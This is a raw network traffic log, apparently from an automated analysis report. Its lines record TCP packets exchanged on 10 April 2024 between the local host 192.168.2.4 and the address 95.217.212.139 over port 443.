                                                                                                                                                                                                          Apr 10, 2024 08:56:38.945199966 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.945266008 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.945436954 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.945472002 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.945532084 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.957357883 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.957422018 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.957479954 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.957511902 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.957550049 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.957571030 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.972383022 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.972455978 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.972546101 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.972583055 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.972613096 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.972636938 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.984330893 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.984402895 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.984584093 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.984622955 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.984711885 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.997783899 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.997833014 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.998013973 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.998013973 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.998064041 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:38.998155117 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.010026932 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.010070086 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.010268927 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.010268927 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.010293007 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.010382891 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.020946026 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.020986080 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.021039009 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.021044016 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.021095991 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.021120071 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.033304930 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.033345938 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.033396959 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.033402920 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.033456087 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.033478975 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.043487072 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.043540955 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.043637991 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.043642998 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.043809891 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.054061890 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.054105043 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.054400921 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.054464102 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.054554939 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.063275099 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.063319921 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.063374043 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.063388109 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.063425064 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.063445091 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.073669910 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.073724985 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.073798895 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.073813915 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.073848963 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.073883057 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.082273006 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.082314968 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.082362890 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.082375050 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.082410097 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.082432032 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.091361046 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.091408968 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.091487885 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.091494083 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.091525078 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.091545105 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.099503040 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.099544048 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.099600077 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.099606037 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.099648952 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.099674940 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.108464956 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.108508110 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.108577967 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.108591080 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.108649015 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.248869896 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.253333092 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.253372908 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.253411055 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.253421068 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.253571033 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.253571033 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.258866072 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.258908033 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.258975983 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.258986950 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.259084940 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.264074087 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.264128923 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.264168978 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.264180899 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.264208078 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.264265060 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.268585920 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.268630981 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.268673897 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.268687010 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.268716097 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.268747091 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.272864103 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.272907019 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.272952080 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.272963047 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.272990942 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.273016930 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.277308941 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.277399063 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.277442932 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.277453899 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.277482986 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.277499914 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.282166004 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.282210112 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.282263994 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.282274961 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.282303095 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.282325983 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.286297083 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.286339998 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.286386013 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.286396980 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.286422014 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.286438942 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.290915966 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.290956974 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.291002989 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.291013956 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.291071892 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.294812918 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.294853926 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.294898987 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.294909954 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.294938087 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.294969082 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.298762083 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.298804045 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.298846960 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.298861980 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.298887014 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.298916101 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.302690983 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.302747011 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.302794933 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.302805901 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.302834034 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.302870989 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.307596922 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.307684898 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.307756901 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.307768106 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.307816029 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.307836056 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.311239958 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.311280966 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.311330080 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.311341047 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.311391115 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.311408997 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.316051006 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.316092014 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.316143990 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.316154957 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.316183090 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.316205025 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.319766998 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.319808960 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.319856882 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.319866896 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.319895983 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.319916010 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.323306084 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.323345900 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.323390961 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.323400974 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.323427916 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.323450089 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.326878071 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.398608923 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.398638010 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.398660898 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.401232004 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.401273966 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.401318073 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.401328087 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.401359081 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.401379108 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.404448986 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.404489040 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.404531002 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.404541969 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.404571056 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.404591084 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.407016993 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.407057047 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.407104015 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.407114983 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.407152891 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.407170057 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.409641981 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.409717083 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.409729958 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.409812927 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.409853935 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.409877062 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.412134886 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.412174940 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.412215948 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.412245989 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.412306070 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.412306070 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.415316105 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.415355921 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.415518999 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.415518999 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.415584087 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.415693045 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.417773962 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.417817116 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.417860985 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.417876005 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.417905092 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.417932987 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.420247078 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.420341969 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.420382023 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.420396090 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.420424938 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.420449972 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.423443079 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.423486948 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.423578024 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.423578024 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.423644066 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.423705101 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.425658941 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.425699949 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.425760031 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.425829887 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.425873041 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.425898075 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.428107023 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.428145885 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.428195953 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.428210020 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.428272009 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.428272009 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.430471897 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.430510998 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.430555105 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.430567980 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.430599928 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.430641890 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.433213949 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.433254004 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.433304071 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.433372021 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.433413029 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.433437109 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.435832024 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.435873032 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.435914993 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.435929060 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.435960054 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.436027050 CEST49761443192.168.2.495.217.212.139
